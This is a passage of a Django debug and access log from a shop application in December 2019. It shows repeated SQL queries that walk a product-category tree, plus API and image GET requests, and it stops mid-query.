139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:38:12] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:13] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:14] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:15] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:15] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:15] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 13:38:15] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 DEBUG 2019-12-13 13:38:42,573 utils 19021 139703090349824 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:38:42,580 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:38:42,584 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:38:42,587 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:38:42,593 utils 19021 139703090349824 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:38:42,596 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:38:42,599 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:38:42,602 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:38:42,604 utils 19021 139703101101824 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 13:38:42,610 utils 19021 139703090349824 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:38:42,614 utils 19021 139703101101824 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:38:42,615 utils 19021 139703090349824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:38:42,619 utils 19021 139703090349824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) [13/Dec/2019 13:38:42] "GET /api/v1/categories/10 HTTP/1.0" 200 183 DEBUG 2019-12-13 13:38:42,622 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:38:42,624 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:38:42,627 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:38:42,631 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:38:42,634 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:38:42,637 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:38:42,640 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:38:42,642 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:38:42,645 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:38:42,648 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:38:42,650 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:38:42,653 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:38:42,656 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:38:42,658 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:38:42,661 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:38:42,664 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:38:42,666 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:38:42,669 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:38:42,671 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:38:42,674 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:38:42,677 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:38:42,680 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:38:42,682 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:38:42,685 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:38:42,688 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:38:42,690 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:38:42,693 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:38:42,696 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:38:42,699 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:38:42,701 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:38:42,704 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:38:42,706 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:38:42,709 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:38:42,714 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:38:42,717 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:38:42] "GET /api/v1/categories/ HTTP/1.0" 200 8596 DEBUG 2019-12-13 13:40:38,988 utils 19021 139703090349824 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:40:38,998 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:40:39,003 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:40:39,009 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:40:39,017 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:40:39,024 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:40:39,031 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:40:39,036 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:40:39,041 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:40:39,046 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 